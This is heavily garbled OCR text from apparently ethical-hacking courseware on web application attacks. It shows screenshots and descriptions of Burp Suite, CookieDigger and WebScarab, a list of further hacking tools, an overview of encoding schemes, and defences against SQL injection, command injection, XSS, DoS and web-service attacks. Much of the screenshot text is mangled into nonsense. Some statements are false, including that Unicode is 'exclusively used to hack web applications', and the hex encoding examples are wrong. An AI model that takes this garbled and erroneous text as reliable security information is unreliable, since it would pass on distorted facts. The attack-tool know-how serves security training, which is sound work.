Pcoxy-Connection: keep-alive
Osec-Agent: B o s ilU /5 .0 .Vindoirs NT €.21 VOV£4» A ppleV ebr.it/S 37.4
KHTHL, lik e Gecko* Chrone/22.0.1229.94 S afar 1/S37.4
A ccept: • / •
Peterer:
h ttp : / / m . b in g . c o a / 1anag«9 s^arch7q-blkes41d-*CCC7£70fSC1CD3A9d:EABESe'3
1‫ל‬ FE8S7SD1ZS94 4FOPH• IQFPBA
A ccept-B ncoding: g s ip ,d e fla te ,s d e h
Accept-Lanyua<j• : en-U S .en;q-0.0
A cce p t-C h a rse t: IS O -O O S 9 -1 ,u tf-0 ;q -0 .7 ,•;q -0 .3
a M M U A K L /•1am
‫־‬*nnnrn[ 1•m*
b u rp suite free e d itio n v1.4.01
[ourp mtruJet repeater *‫תי‬‫©ני‬* acoat
mfruder rspaal•( saque decoder ' compare* ' 0f*0ns Mart*
‫ג‬p«der
L 21 ‫ז‬
I target posiaons pa>ioads op«ons
attack type *nicer
2 payload posAon* lengti i
t h ’ i d - f 1 . 4 1500402: 3>> ‫ל‬0‫צ‬ i s H> .- 5 1 .1 * HTTP 7 7 7 ‫־‬
Moat: c a 4 .rv.b 1 n g .n e t
Proxy-C onnection: k e e p -a liv e
U set-A gent: H o :illa /5 .0 iV indovs 1JT f . 2 ; WOVi 4 !
A p p le fe b rit/S 3 7 .4 ‫י‬ KHTHL, lik e Gecko!
C h ro w e /::.0 .1 2 :9 .9 4 S a fa ci/S 3 7 .4
A ccept: • / •
P e te te c:
h ttp : v v v .b in g .c jS ‘ usages seated?qab ik e s (id aCCCC7670
CSC1CD3A9DIEABE6(3SlKE8S7SD12£944KOPHa IQFPBA
A ccept-E ncoding: g z ip ,d e fla te ,s d e h
F I G U R E 1 3 . 5 8 : B u r p S u i t e P r o f e s s i o n a l T o o l S c r e e n s h o t

CEH
CookieDigger
j CookieDigger helps identify weak cookie generation and insecure im plem entations o f session management by web applications
J It works by collecting and analyzing cookies issued by a web application fo r m ultiple users
J The tool reports on th e predictability and entropy of th e cookie and w hether critical inform ation, such as user name and
password, are included in the cookie values
Foundstone Cookie Digger
F o u n d s to n e | C ookieD igger
f_soace‫״‬‫־‬et«tnpv.3A"2.‫׳‬F 2 ..‫־‬ffrai
' jd f n
(jw d ‫«*■**־‬p»e
« Back Mod >
http://w w w .m cafee.com
tea URLs'/*
31com/.‫ק‬‫ו‬‫ו‬*i/Vim‫ן‬
',accounts gootfe coro/SeracelognAih
/|1*'m»l.google.conz_,'na»-1t*1c/_/)s./>Mr.lrj11f1*Ai1er»X04lWI$a»St.«n/rv
httpsy/tnal.google oorvmalAvO.Ai•28v1ew*«ptver^hrt4nw»*r4
https://msi google cwn/VnaHi/UAj«2hin»^aplw nchm > 6 t14
tn•! gt>3gl» com/tnsl'U/OAj■cttiU M 1 4/‫/׳‬https
1••httpsy/W»l.google corvm»l'u/Q/'Vw
vaf»X0WKE»e4c an‫׳‬tat1c/_/i«/^Mn/»1jt«4v‫*׳‬https.AVnsI google axn/_/'1nad
1',u/O.'^J■2>v»w<)«p/*‫«יז‬https //hi•! gosgl• con
U/0. ,J •24vww<«plvar*chfiHrw&-tr*‫׳‬httpsy/W»l.g00gl*.C«ffV,m»l
4<hflps //Vnal google co«n/n>alA^0-'>j«28vTew^>spUw <1W*rwQ*ty
https //h»«l google co!nATwlAj/t)Aj*ft1rtt1y«c
HardAdnwvhtir‫׳‬fts /Amkjpdt
httpy/maim.oom/
http //WWWr convlognvtrfy y c
httpy/m*l r.o0ffvr*wm»(Atand«tphp>»^d*U^••
about War*
http //hotmatl/
httpy/ww*.f>otm»lcom/
W e b A p p l i c a t i o n H a c k i n g T o o l : C o o k i e D i g g e r
Source: h ttp ://w w w .m c a fe e .c o m
C ookieD igger is a to o l th a t d e te cts v u ln e ra b le cookie g e n e ra tio n and th e insecure
im p le m e n ta tio n o f session m a n a g e m e n t by w e b a pp lica tion s. This to o l is based on th e
c o lle c tio n and e va lu a tio n o f cookies by a w e b a p p lic a tio n used by m any users.
C e rta in ty and e n tro p y o f th e cookie are fa cto rs on w h ich th e to o l relies. The cookie values
co n ta in va lu ab le in fo rm a tio n such as th e login d e ta ils o f th e user (user nam e and passw ord).

F o u n d s t o n e C o o k i e D i g g e r
File Help
Foundstone | CookieDigger
POSTData;
rttp%3A%2F%2fmain.com‫״‬f_sourceret
./2Fnewm«l
%2Frt>oxphpJJgfrm*<nai!fjd*™matthews4
f_pwd*sweetp!e
VistedURLs
http//Wwwgmadcom/
https://accountsgoogle.com/ServiceLoginAuh
httpsJ/meigooglecom/_/m«l-stabc/_/js/man/m_11/rt41/ver*X061WK£se4ken/*v*1/am«f
24vtew»bsp4ver*ohN4rw8mbn4‫־‬httpsJ/mMgooglecom/mai/u/OAj
0W4fw8mbn4‫־‬bsp4ver‫־‬httpsJ/maigooglecom/mail/u/OAji-2&v1ew
bsp4ver«ohH4rw&nbo4‫־‬httpsJ/maigooglecom/mad/u/OAji=24vtew
1‫־‬https//maJgooglecom/ma1l/u/Q/'>shva
https://maJgooglecom/_/mad■stafcc/_/j3/man/m_iJt/rt4/ver»X06lWKEse4ken7$v»1/a<n»f
httpsV/maigooglecom/mail/u/0Aj1*24v1ew«bsp4ver»ohN4rw&T1bn4
bsp4ver*ohH4rw&T1bn4‫״‬24v1ew‫״‬https://maigooglecom/ma!l/u/0Ajt
googlecom/marf/u/0/'>u1-24v>ew-6sp4ver-ohH4rw&nbr14
c‫״‬https//ma<googlecom/mad/u/0Aj!4tml4zy
res//!esetupdB/HardMmmKm
http//wwwmcom/loginvenfyphp UserID |jg
http//mailjncom/newmad/ftemdexphp,msgd*4type•
aboutblank Password I* ®
Nod »« Back
http//hotmaJ/
http//Wwwhotmadcom/
F I G U R E 1 3 . 5 9 : C o o k i e D i g g e r T o o l S c r e e n s h o t

CEH
WebScarab
W e b S c a r a b is a f r a m e w o r k f o r a n a l y z i n g a p p l i c a t i o n s t h a t c o m m u n i c a t e u s i n g t h e H T T P a n d H T T P S p r o t o c o l s
I t a l l o w s t h e a t t a c k e r t o r e v i e w a n d m o d i f y r e q u e s t s c r e a t e d b y t h e b r o w s e r b e f o r e t h e y a r e s e n t t o t h e s e r v e r ,
a n d t o r e v i e w a n d m o d i f y r e s p o n s e s r e t u r n e d f r o m t h e s e r v e r b e f o r e t h e y a r e r e c e i v e d b y t h e b r o w s e r
C o m p a reS c rip te d F ra g m e n tsS p id e r E x te n s io n s S e s s io n ID A n a ly s isM a n u a l R e q u e s t W e b S e rv ic e sP ro x y
F ile V ie w I o o ls H elp
S u m m a ry M e s s a g e lo g
□ T re e S e le c tio n n ite r s c o n v e rs a tio n lis t
U rl M e th o d s S ta tu s | S e t-C o o k ie C o m m e n ts S cn p ts
? (1 5 h ttp ://w w w .o w a s p .o ra :8 0 / G E T 301 M o v e d .. □ □ □
° ‫־‬ n b a n n e rs / □ □ □
o - n im a a e s / □ □ □
9 (1 3 in d e x p h p / □ □ □
O M a ln _ P a g e G ET 2 0 0 O K □ E
o-□ s k in s / □ □ □
2 S u m m a ry
O rig in
Proxy
Proxy
P roxy
Proxy
S tatu s
2 D U O Khttp /M vw w o w a s p org BU /s k in s /m o n o b o o k /m a in '•‫־/׳‬
P a th
/s k in s /c o m m o n /IE F ix e s
/s k in s /c o m m o n /c o m m o
H o s t
http:fA1v w w .o w a s p .o rg 80
http ://w w w .o w a s p .o rg .8 0
h ttp ://w w w .o w a s p org 80 /in d e x p h p /M a m _ P a g e
h ttp ://w w w .o w a s p .o rg .8 0 l/
'‫׳‬ UUb/UbOT U t I
2 0 0 6 /0 6 /2 3 G ET
2 0 0 6 /0 6 /2 3 ... G E T
http://w w w .ow asp.org
W e b A p p l i c a t i o n H a c k i n g T o o l : W e b S c a r a b
Source: h ttp ://w w w .o w a s p .o rg
W ebS carab is a fra m e w o rk fo r analyzing a p p lica tio n s th a t co m m u n ic a te using th e HTTP and
HTTPS p ro to co ls. It is w ritte n in Java, and is th u s p o rta b le to m any p la tfo rm s . W ebS carab has
several m odes o f o p e ra tio n , im p le m e n te d by a n u m b e r o f p lu gin s. It o pe ra te s as an
in te rc e p tin g proxy, a llo w in g th e a tta c k e r to re vie w and m o d ify requests created by th e b ro w se r
b e fo re th e y are sent to th e server, and to re vie w and m o d ify responses re tu rn e d fro m th e
server b e fo re th e y are received by th e b ro w se r. It is even able to in te rc e p t b o th HTTP and
HTTPS co m m u n ic a tio n . The o p e ra to r can also re vie w th e co nve rsa tion s (requests and
responses) th a t have passed th ro u g h W ebS carab.

i W e b S c a r a b
X
F ile V ie w I o o ls H e lp
S u m m a ry M e s s a g e lo g P r o x y M a n u a l R e q u e s t W e b S e r v ic e s S p id e r E x te n s io n s S e s s io n ID A n a ly s is S c r ip te d F r a g m e n ts F u z z e r C o m p a re 1 1
E l S u m m a ry a 1
*
□ T r e e S e le c tio n f ilt e r s c o n v e r s a tio n lis t
U rl M e th o d s S ta tu s S e t-C o o k le C o m m e n ts S c rip ts J
? h ttp ://w w w .o w a s p .o rg :8 0 /
° 3 ] ‫־‬ b a n n e r s /
o - C 3 im a g e s /
? In d e x p h p /
Q M a in _ P a g e
o - s k in s /
G E T
G E T
301 M o v e d ...
2 0 0 O K
□
□
□
□
□
□
□
□
□
□
• ‫׳‬
□
□
□
□
□
0
□
-------- ----- --------- —
I D - : ate M e th o d H o s t P a th P a ra m e te rs S ta tu s O rig in I
—
‫ד‬ 2 U 0 B Z D E /2 X T Ufc 1 http ://w w w . o w a s p .0rg :8U /S K in s/m o n o D O O K fm a in 'N 2UU U K P roxy A
4 2 0 0 6 /0 6 /2 3 ... G E T http ://W w w .o w a s p .0rg :80 /s k in s /c o m m o n /IE F tte s . 2 0 0 O K P roxy ‫־‬ ‫־‬
3 2 0 0 6 /0 6 /2 3 . G E T http ://w w w . o w a s p .0rg :80 /s k in s /c o m m o n /c o m m o 2 0 0 O K P roxy
2 2 0 0 6 /0 6 /2 3 G E T h ttp ://W w w .o w a s p .o rg 80 /in d e x p h p /M a in _ P a g e 2 0 0 O K P roxy
1 2 0 0 6 /0 6 /2 3 ... G E T h ttp ://W w w .o w a s p .o rg :8 0 / 301 M o v e d ... P roxy -
‫י‬ III 1 ►
i . 2 7 / 6 3 .5 6
F I G U R E 1 3 . 6 0 : W e b S c a r a b T o o l S c r e e n s h o t

Web Application Hacking Tools I CEH
H t t p B e e
h ttp : / / w w w .oOo. n u
T e l e p o r t P r o
^ ► ^ 4 ) h ttp : / / w w w .te n m a x . c o m
W e b C o p i e r
h ttp : / / w w w .m a x im u m s o ft.c o m
‫י‬
H T T T R A C K
h ttp : / / w w w .h ttra c k . c o m
M i l e S C A N P a r o s P r o
h ttp : // w w w .m ile s can . c o m
&
M
■ a — s ‫־‬
I n s t a n t S o u r c e
h tt p : / / w w w .b la z in g to o ls .c o m
w 3 a f
h ttp : // w 3 a f.s o u rc e fo rg e , n e t
G N U W g e t
h ttp :// g n u w in 3 2 .s o u rc e fo rg e , n e t
B l a c k W i d o w
h ttp : // s o ftb y te la b s .co m
c U R L
h tt p : / / c u r I.haxx. s ef£3
/ W e b A p p l i c a t i o n H a c k i n g T o o l s
A fe w m o re to o ls th a t can be used fo r hacking w e b a p p lica tio n s are listed as fo llo w s :
© In sta n t Source available at h ttp ://w w w .b la z in g to o ls .c o m
© w 3 a f available at h ttp ://w 3 a f.s o u rc e fo rg e .n e t
© GNU W g e t available at h ttp ://g n u w in 3 2 .s o u rc e fo rg e .n e t
© B la ckW ido w available at h ttp ://s o ftb y te la b s .c o m
© cURL available at h ttp ://c u rl.h a x x .s e
© H ttpB ee available at h ttp ://w w w .0Q0.nu
© T e le p o rt Pro available at h ttp ://w w w .te n m a x .c o m
© W e b C o pie r available at h ttp ://w w w .m a x im u m s o ft.c o m
© H i l l RACK available a t h ttp ://w w w .h ttra c k .c o m
© MileSCAN ParosPro available a t h ttp ://w w w .m ile s c a n .c o m

ModuleFlow
W eb A pp C oncepts
0‫י‬ I,W eb A pp Pen Testing
W eb A p p T hreats
&q y
S e curity Tools
C ounterm easures
W eb A p p lic a tio n H acking Tools
‫־‬ ‫־‬ ^ M o d u l e F l o w
So fa r, w e have discussed va riou s concepts such as th re a ts associated w ith w eb
a p p lica tio n s, hacking m e th o d o lo g y , and hacking to o ls. All these to pics ta lk a b o u t h o w th e
a tta c k e r breaks in to a w e b a p p lic a tio n o r a w e b site . N ow w e w ill discuss w e b a p p lica tio n
c o u n te rm e a s u re s . C ounterm e asu res are th e pra ctice o f using m u ltip le se cu rity system s or
te ch n o lo g ie s to p re v e n t in tru sio n s. These are th e key co m p o n e n ts fo r p ro te c tin g and
safeguarding th e w e b a p p lic a tio n against w e b a p p lic a tio n attacks.
V W e b A pp Pen T estin g /jj&Mk W e b A p p C oncepts
^ S e cu rity Tools
•.r"
W e b A p p T h re a ts
C o u n te rm e a su re s
m
e5=‫־‬ H acking M e th o d o lo g y
(j ' ‫י‬
W e b A p p lic a tio n H acking Tools
vf 1

This section h ig hligh ts va riou s w ays in w h ich you can d efe nd against w e b a p p lica tio n attacks
such as SQL in je c tio n attacks, co m m an d in je c tio n attacks, XSS attacks, etc.

CEHEncodingSchemes
W e b a p p l i c a t i o n s e m p l o y d i f f e r e n t e n c o d i n g s c h e m e s f o r t h e i r
d a t a t o safelyhandle unusual characters and binary data i n t h e
w a y y o u i n t e n d
URL e n co d in g is th e process o f c o n v e rtin g URL in to va lid ASCII
fo rm a t so th a t da ta can be safely tra n s p o rte d o v e r HTTP
URL e n co d in g replaces u n u su a l ASCII characters w ith "% "
fo llo w e d b y th e c h a ra cte r's tw o -d ig it ASCII code expressed in
h exa decim al such as:
% 3 ‫ט‬ d ‫־‬
a % 0 a N e w lin e
« %20 sp a ce
An HTML e n co d in g schem e is used to re p re se n t unu sual
characters so th a t th e y can be safely c o m b in e d w ith in an
HTML d o c u m e n t
It d e fin e s several HTML e n titie s to re p re se n t p a rticu la rly
usual characters such as:
E n c o d i n g S c h e m e s
— ‫—־‬ HTTP p ro to c o l and th e HTM L language are th e tw o m a jo r co m p o n e n ts o f w eb
a pp lica tion s. Both these co m p o n e n ts are te x t based. W eb a p p lica tio n s e m p lo y encoding
schem es to ensure b o th these c o m p o n e n t handle unusual characters and b in a ry d ata safely.
The e nco ding schem es include:
m U R L E n c o d i n g
URLs are p e rm itte d to co n ta in o n ly th e p rin ta b le characters o f ASCCI code w ith in th e
range 0x20-0x7e inclusive. Several characters w ith in th is range have special m eaning
w he n th e y are m e n tio n e d in th e URL schem e o r HTTP p ro to c o l. H ence, such ch aracters are
re s tric te d .
URL e nco ding is th e process o f co n v e rtin g URLS in to valid ASCII fo rm a t so th a t data can be
safely tra n s p o rte d o ve r HTTP. URL e nco ding replaces unusual ASCII characters w ith "% "
fo llo w e d by th e ch a ra cte r's tw o -d ig it ASCII code expressed in h exa d e cim a l such as:
Q %3d
Q %0a New l i n e
9 %20 space

> H T M L E n c o d i n g
*** The HTML e nco ding schem e is used to re p re se n t unusual ch aracters so th a t th e y can be
safely e n te re d w ith in an HTM L d o c u m e n t as p a rt o f its c o n te n t. The s tru c tu re o f th e d o c u m e n t
is d e fin e d by va riou s characters. If you w a n t to use th e sam e characters as p a rt o f th e
d o c u m e n t's c o n te n t, you m ay face p ro b le m . This p ro b le m can be o vercom e by using HTML
encoding. It d efin es several H TM L e n titie s to re p re se n t p a rtic u la rly usual characters such as:
Q & a m p ; &
e & it; <
e & g t; >

CEHE n c o d in g S c h e m e s
( C o n t 1(!)
Hex Encoding
HTML encoding scheme uses
hex value of every character
to represent a collection o f
characters fo r tra n sm ittin g
binary data
Base64 Encoding
Base64 encoding scheme
represents any binary data
using only printable ASCII
characters
tt Example:
Hello A125C458D8
Jason 123B684AD9
E n c o d i n g S c h e m e s ( C o n t ’ d )
Hex Encoding
An HTML encoding schem e uses hex value
o f every character to represent a
colle ctio n o f characters fo r tra n s m ittin g
binary data.
Example:
H e llo A125C 458D 8
J a s o n 123B684A D 9
Base 64 Encoding
Base 64 schem es are used to encode
binary data. A Base 64 enco ding schem e
represents any binary data using only
p rin ta b le ASCII characters. Usually it is
used fo r encoding em ail a tta ch m e n ts fo r
safe tran sm ission ove r SMTP and also
used fo r encoding user credentials.
Example:
c a k e
0110001101100001011010110110
0101
B a se 6 4 E n c o d in g : 0 11 0 0 0
110110 000101 101011 011001
010000 000000 000000
Unicode Encoding
Unicode is a character encoding
standard that is designed to support
all of the writing systems used in the
world. Unicode is exclusively used to
hack web applications. Unicode
encoding helps attackers to bypass
the filters.
16-bit Unicode encoding:
It replaces unusual Unicode
characters with "%u" followed by the
character's Unicode code point
expressed in hexadecimal:
% u2215 /
% u00e9
U T F - 8
It is a variable-length encoding
standard that uses each byte
expressed in hexadecimal and
preceded by the %prefix:
%c2%a9
%«2%89%a0
TABLE 13 .2 : E n co d in g S c h e m e s T ab le

CEH
How to Defend Against SQL
Injection Attacks
Lim it th e le n g th o f user input
Use custom e rro r messages
M o n ito r DB tra ffic using an IDS, WAF
Disable com m ands like xp _cm dshe ll
Isolate database server and w e b server
Always use m e th o d a ttrib u te set to POST
Run database service accou nt w ith m inim al rights
M ove extended store d pro ce d u re s to an isolated server
Use typesafe variables or functions such as IsNum eric() to ensure typesafety
V a lidate and sanitize user inputs passed to the database
Use lo w privileged accou nt fo r DB c o n n e c tio n
JT
1
Microsoft
S Q L
S e r v e r
H o w t o D e f e n d A g a i n s t S Q L I n j e c t i o n A t t a c k s
T o d e f e n d a g a i n s t SQL i n j e c t i o n a t t a c k s , v a r i o u s t h i n g s h a v e t o b e t a k e n c a r e o f like
u n c h e c k e d u s e r - i n p u t t o d a t a b a s e - q u e r i e s s h o u l d n o t b e a l l o w e d t o p a s s . E v e r y u s e r v a r i a b l e
p a s s e d t o t h e d a t a b a s e s h o u l d b e v a l i d a t e d a n d s a n i t i z e d . T h e g i v e n i n p u t s h o u l d b e c h e c k e d
f o r a n y e x p e c t e d d a t a t y p e . U s e r i n p u t , w h i c h is p a s s e d t o t h e d a t a b a s e , s h o u l d b e q u o t e d .
e Limit t h e l e n g t h o f u s e r i n p u t
e U s e c u s t o m e r r o r m e s s a g e s
e M o n i t o r DB tr a f f i c u s i n g a n IDS, W A P
e D i s a b l e c o m m a n d s like x p _ c m d s h e l l
e I s o l a t e d a t a b a s e s e r v e r a n d w e b s e r v e r
e A l w a y s u s e m e t h o d a t t r i b u t e s e t t o POST
e R u n d a t a b a s e s e r v i c e a c c o u n t w i t h m i n i m a l r i g h t s
0 M o v e e x t e n d e d s t o r e d p r o c e d u r e s t o a n i s o l a t e d s e r v e r
0 U s e t y p e s a f e v a r i a b l e s o r f u n c t i o n s s u c h a s I s N u m e r i c ( ) t o e n s u r e t y p e s a f e t y
© V a l i d a t e a n d s a n i t i z e u s e r i n p u t s p a s s e d t o t h e d a t a b a s e

Q U s e l o w p r i v i l e g e d a c c o u n t f o r DB c o n n e c t i o n

- ‫״‬-How to Defend Against Command
!‫־‬Injection Flaws JL E
0 / H o w t o D e f e n d A g a i n s t C o m m a n d I n j e c t i o n F l a w s
‫׳‬ ^ ' T h e s i m p l e s t w a y t o p r o t e c t a g a i n s t c o m m a n d i n j e c t i o n f l a w s is t o a v o i d t h e m
w h e r e v e r p o s s i b l e . S o m e l a n g u a g e s p e c i f i c l i b r a r i e s p e r f o r m i d e n t i c a l f u n c t i o n s f o r m a n y sh e l l
c o m m a n d s a n d s o m e s y s t e m calls. T h e s e li b r a r i e s d o n o t c o n t a i n t h e o p e r a t i n g s y s t e m shell
i n t e r p r e t e r , a n d s o i g n o r e m a x i m u m sh e l l c o m m a n d p r o b l e m s . F o r t h o s e ca lls t h a t m u s t still b e
u s e d , s u c h a s ca lls t o b a c k e n d d a t a b a s e s , o n e m u s t c a r e f u l l y v a l i d a t e t h e d a t a t o e n s u r e t h a t it
d o e s n o t c o n t a i n m a l i c i o u s c o n t e n t . O n e c a n a l s o a r r a n g e v a r i o u s r e q u e s t s in a p a t t e r n , w h i c h
e n s u r e s t h a t all g i v e n p a r a m e t e r s a r e t r e a t e d a s d a t a i n s t e a d o f p o t e n t i a l l y e x e c u t a b l e c o n t e n t .
M o s t s y s t e m ca lls a n d t h e u s e o f s t o r e d p r o c e d u r e s w i t h p a r a m e t e r s t h a t a c c e p t v a li d i n p u t
s t r i n g s t o a c c e s s a d a t a b a s e o r p r e p a r e d s t a t e m e n t s p r o v i d e s i g n i f i c a n t p r o t e c t i o n , e n s u r i n g
t h a t t h e s u p p l i e d i n p u t is t r e a t e d a s d a t a , w h i c h r e d u c e s , b u t d o e s n o t c o m p l e t e l y e l i m i n a t e t h e
risk i n v o l v e d in t h e s e e x t e r n a l calls. O n e c a n a l w a y s a u t h o r i z e t h e i n p u t t o e n s u r e t h e
p r o t e c t i o n o f t h e a p p l i c a t i o n in q u e s t i o n . L e a s t p r i v i l e g e d a c c o u n t s m u s t b e u s e d t o a c c e s s a
d a t a b a s e s o t h a t t h e r e is t h e s m a l l e s t p o s s i b l e l o o p h o l e .
T h e o t h e r s t r o n g p r o t e c t i o n a g a i n s t c o m m a n d i n j e c t i o n is t o r u n w e b a p p l i c a t i o n s w i t h t h e
p r i v i l e g e s r e q u i r e d t o c a r r y o u t t h e i r f u n c t i o n s . T h e r e f o r e , o n e s h o u l d a v o i d r u n n i n g t h e w e b
s e r v e r a s a r o o t , o r a c c e s s i n g a d a t a b a s e a s a D B A D M I N , o r e l s e a n a t t a c k e r m a y b e a b l e t o
m i s u s e a d m i n i s t r a t i v e r i g h ts . T h e u s e o f J a v a s a n d b o x in t h e J2EE e n v i r o n m e n t s t o p s t h e
e x e c u t i o n o f t h e s y s t e m c o m m a n d s .

T h e u s e o f a n e x t e r n a l c o m m a n d t h o r o u g h l y c h e c k s u s e r i n f o r m a t i o n t h a t is i n s e r t e d i n t o t h e
c o m m a n d . C r e a t e a m e c h a n i s m f o r h a n d l i n g all p o s s i b l e e r r o r s , t i m e o u t s , o r b l o c k a g e s d u r i n g
t h e calls. T o e n s u r e t h e e x p e c t e d w o r k is a c t u a l l y p e r f o r m e d , c h e c k all t h e o u t p u t , r e t u r n , a n d
e r r o r c o d e s f r o m t h e call. A t l e a s t t h i s a l l o w s t h e u s e r t o d e t e r m i n e if s o m e t h i n g h a s g o n e
w r o n g . O t h e r w i s e , a n a t t a c k m a y o c c u r a n d n e v e r b e d e t e c t e d .
© P e r f o r m i n p u t v a l i d a t i o n
© U s e l a n g u a g e - s p e c i f i c li b r a r i e s t h a t a v o i d p r o b l e m s d u e t o sh e l l c o m m a n d s
© U s e a s a f e API t h a t a v o i d s t h e u s e o f t h e i n t e r p r e t e r e n t i r e l y
© U s e p a r a m e t e r i z e d SQL q u e r i e s
© E s c a p e d a n g e r o u s c h a r a c t e r s
© P e r f o r m i n p u t a n d o u t p u t e n c o d i n g
© S t r u c t u r e r e q u e s t s s o t h a t all s u p p l i e d p a r a m e t e r s a r e t r e a t e d a s d a t a , r a t h e r t h a n
p o t e n t i a l l y e x e c u t a b l e c o n t e n t
© U s e m o d u l a r sh e l l d i s a s s o c i a t i o n f r o m k e r n e l

C E H
How to Defend Against XSS
Attacks
V a lid a te a ll h e a d e rs , Use te s tin g to o ls
c o o k ie s , q u e ry s trin g s , E ncode In p u t e x te n s iv e ly d u rin g th e D o n o t a lw a ys
fo rm fie ld s , a nd h id d e n a nd o u tp u t and d e s ig n pha se to tr u s t w e b s ite s
fie ld s (i.e ., a ll p a ra m e te rs ) f ilt e r M e ta e lim in a te such XSS th a t use HTTPS
a g a in s t a rig o ro u s c h a ra c te rs in th e h o le s in th e a p p lic a tio n w h e n it co m e s to
s p e c ific a tio n in p u t b e fo re it goe s in to use XSS
1 3 x 5 _ 7
%
▼
2 4 6 8
Use a w e b
/
F ilte rin g s c rip t o u tp u t
/
C o n ve rt all non -
y
D evelop som e sta n d a rd o r
a p p lic a tio n fire w a ll can a ls o d e fe a t XSS a lp h a n u m e ric characters signing scripts w ith p riva te
t o b lo c k th e v u ln e ra b ilitie s by to HTML ch a ra cte r and p ub lic keys th a t
e x e c u tio n o f p re v e n tin g th e m fro m e n titie s b e fo re d isplaying a ctu a lly check to ascertain
m a lic io u s s c rip t b e in g tra n s m itte d to
th e user in p u t in search th a t th e scrip t in tro d u c e d
eng ines and fo ru m s is really a u th e n tic a te d
u se rs
Copyright © by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
H o w t o D e f e n d A g a i n s t X S S A t t a c k s
| T h e f o l l o w i n g a r e t h e d e f e n s i v e t e c h n i q u e s t o p r e v e n t XSS a t t a c k s :
C h e c k a n d v a l i d a t e all t h e f o r m f i e ld s, h i d d e n fi e ld s , h e a d e r s , c o o k i e s , q u e r y s t r i n g s , a n d
all t h e p a r a m e t e r s a g a i n s t a r i g o r o u s s p e c i f i c a t i o n .
Q
© I m p l e m e n t a s t r i n g e n t s e c u r i t y policy.
© W e b s e r v e r s , a p p l i c a t i o n s e r v e r s , a n d w e b a p p l i c a t i o n e n v i r o n m e n t s a r e v u l n e r a b l e t o
c r o s s - s i t e s c r i p t i n g . It is h a r d t o i d e n t i f y a n d r e m o v e XSS f l a w s f r o m w e b a p p l i c a t i o n s .
T h e b e s t w a y t o fi n d f l a w s is t o p e r f o r m a s e c u r i t y r e v i e w o f t h e c o d e , a n d s e a r c h in all
t h e p l a c e s w h e r e i n p u t f r o m a n HTTP r e q u e s t c o m e s a s a n o u t p u t t h r o u g h HTML.
Q A v a r i e t y o f d i f f e r e n t H T M L t a g s c a n b e u s e d t o t r a n s m i t a m a l i c i o u s J a v a S c r i p t . N e s s u s ,
N ik to , a n d o t h e r t o o l s c a n h e l p t o s o m e e x t e n t f o r s c a n n i n g w e b s i t e s f o r t h e s e f l a w s . If
v u l n e r a b i l i t y is d i s c o v e r e d in o n e w e b s i t e , t h e r e is a h i g h c h a n c e o f it b e i n g v u l n e r a b l e t o
o t h e r a t t a c k s .
© Fil te r t h e s c r i p t o u t p u t t o d e f e a t XSS v u l n e r a b i l i t i e s w h i c h c a n p r e v e n t t h e m f r o m b e i n g
t r a n s m i t t e d t o u s e r s .
© T h e e n t i r e c o d e o f t h e w e b s i t e h a s t o b e r e v i e w e d if it h a s t o b e p r o t e c t e d a g a i n s t XSS
a t t a c k s . T h e s a n i t y o f t h e c o d e s h o u l d b e c h e c k e d b y r e v i e w i n g a n d c o m p a r i n g it a g a i n s t
e x a c t s p e c i f i c a t i o n s . T h e a r e a s s h o u l d b e c h e c k e d a s f o l l o w s : t h e h e a d e r s , a s w e l l a s

c o o k i e s , q u e r y s t r i n g f o r m fi e ld s , a n d h i d d e n f i e ld s. D u r i n g t h e v a l i d a t i o n p r o c e s s , t h e r e
m u s t b e n o a t t e m p t t o r e c o g n i z e t h e a c t i v e c o n t e n t , n e i t h e r t o r e m o v e t h e f i l t e r n o r
s a n i t i z e it.
© T h e r e a r e m a n y w a y s t o e n c o d e t h e k n o w n f i lt e r s f o r a c t i v e c o n t e n t . A " p o s i t i v e
s e c u r i t y p o l i c y " is h ig h l y r e c o m m e n d e d , w h i c h s p e c i f i e s w h a t h a s t o b e a l l o w e d a n d
w h a t h a s t o b e r e m o v e d . N e g a t i v e o r a t t a c k s i g n a t u r e - b a s e d p o l i c i e s a r e h a r d t o
m a i n t a i n , a s t h e y a r e i n c o m p l e t e .
0 I n p u t f i e l d s s h o u l d b e l i m i t e d t o a m a x i m u m s i n c e m o s t s c r i p t a t t a c k s n e e d s e v e r a l
c h a r a c t e r s t o g e t s t a r t e d .

-
How to Defend Against DoS Attack C E H
H o w t o D e f e n d A g a i n s t D o S A t t a c k s
‫ל‬ T h e f o l l o w i n g a r e t h e v a r i o u s m e a s u r e s t h a t c a n b e a d o p t e d t o d e f e n d a g a i n s t DoS
a t t a c k s :
6 C o n f i g u r e t h e f i r e w a l l t o d e n y e x t e r n a l I n t e r n e t C o n t r o l M e s s a g e P r o t o c o l (I CM P) tr a f f i c
a c c e s s .
© S e c u r e t h e r e m o t e a d m i n i s t r a t i o n a n d c o n n e c t i v i t y t e s t i n g .
© P r e v e n t u s e o f u n n e c e s s a r y f u n c t i o n s s u c h a s g e t s , s t r c p y , a n d r e t u r n a d d r e s s e s f r o m
b e i n g o v e r w r i t t e n , e t c .
0 P r e v e n t s e n s i t i v e i n f o r m a t i o n f r o m o v e r w r i t i n g .
0 P e r f o r m t h o r o u g h i n p u t v a l i d a t i o n .
© D a t a p r o c e s s e d b y t h e a t t a c k e r s h o u l d b e s t o p p e d f r o m b e i n g e x e c u t e d .
Secure th e re m o te a d m in is tra tio n
and c o n n e c tiv ity te stin g
P e rform th o ro u g h
in p u t va lid a tio n
C o n fig u re th e fire w a ll to
d e n y e xte rn a l In te rn e t
C o n tro l M essage P ro to co l
(IC M P ) tra ffic access
Data processed by th e
a tta c k e rs h o u ld be sto p p e d
fro m being executed
P re ve n t use o f unnecessary
fu n c tio n s such as gets, strcpy,
and re tu rn addresses fro m
o v e rw ritte n etc.
P re ve n t th e sensitive
in fo rm a tio n
fro m o v e rw ritin g

How to Defend Against Web
Services Attack CEHUrt1fw4 ilhiul lUtbM
Configure firewalls/IDS systems
for a web services anomaly and
signature detection
Configure firewalls/IDS systems
to filte r im proper SOAP and
XML syntax
Im plem ent centralized in-line
requests and responses
schema validation
Block external references and
use pre-fetched content when
de-referencing URLs
M aintain and updatea secure
repository o f XML schemas
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited
Configure WSDL Access
Control Permissions to grant
or deny access to any type of
WSDL-based SOAP messages
Use docum ent-centric
authentication credentials
that useSAML
Use multiple security credentials
such as X.509 Cert, SAML
assertions and WS-Security
Deploy w eb services-capable
firew alls capable o f SOAP and
